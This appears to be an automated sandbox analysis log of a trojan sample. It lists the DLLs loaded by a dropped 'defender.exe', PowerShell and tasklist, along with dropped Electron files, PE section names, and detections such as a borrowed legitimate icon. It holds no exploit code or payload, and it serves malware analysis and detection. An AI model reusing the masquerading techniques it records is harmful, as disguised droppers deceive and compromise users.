Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: msmpeg2vdec.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mfperfhelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dxva2.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: msvproc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeStatic file information: File size 69484987 > 1048576
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: libEGL.dll.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: .voltbl
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: .voltbl
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: defender.exe.0.drStatic PE information: section name: .00cfg
Source: defender.exe.0.drStatic PE information: section name: .gxfg
Source: defender.exe.0.drStatic PE information: section name: .retplne
Source: defender.exe.0.drStatic PE information: section name: .rodata
Source: defender.exe.0.drStatic PE information: section name: .voltbl
Source: defender.exe.0.drStatic PE information: section name: CPADinfo
Source: defender.exe.0.drStatic PE information: section name: LZMADEC
Source: defender.exe.0.drStatic PE information: section name: _RDATA
Source: defender.exe.0.drStatic PE information: section name: malloc_h
Source: ffmpeg.dll.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: .voltbl
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll0.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll0.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.0.drStatic PE information: section name: .retplne
Source: libEGL.dll0.0.drStatic PE information: section name: .voltbl
Source: libEGL.dll0.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.0.drStatic PE information: section name: .voltbl
Source: libGLESv2.dll0.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .voltbl
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: .voltbl
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: defender.exe0.0.drStatic PE information: section name: .00cfg
Source: defender.exe0.0.drStatic PE information: section name: .gxfg
Source: defender.exe0.0.drStatic PE information: section name: .retplne
Source: defender.exe0.0.drStatic PE information: section name: .rodata
Source: defender.exe0.0.drStatic PE information: section name: .voltbl
Source: defender.exe0.0.drStatic PE information: section name: CPADinfo
Source: defender.exe0.0.drStatic PE information: section name: LZMADEC
Source: defender.exe0.0.drStatic PE information: section name: _RDATA
Source: defender.exe0.0.drStatic PE information: section name: malloc_h
Source: ffmpeg.dll0.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.0.drStatic PE information: section name: .voltbl
Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
Source: 31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.node.12.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAAB7D00AD pushad ; iretd 23_2_00007FFAAB7D00C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\defender.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile created: C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\ffmpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile created: C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsrF83A.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\LICENSE.electron.txtJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (29).png
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeRegistry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SpellingJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
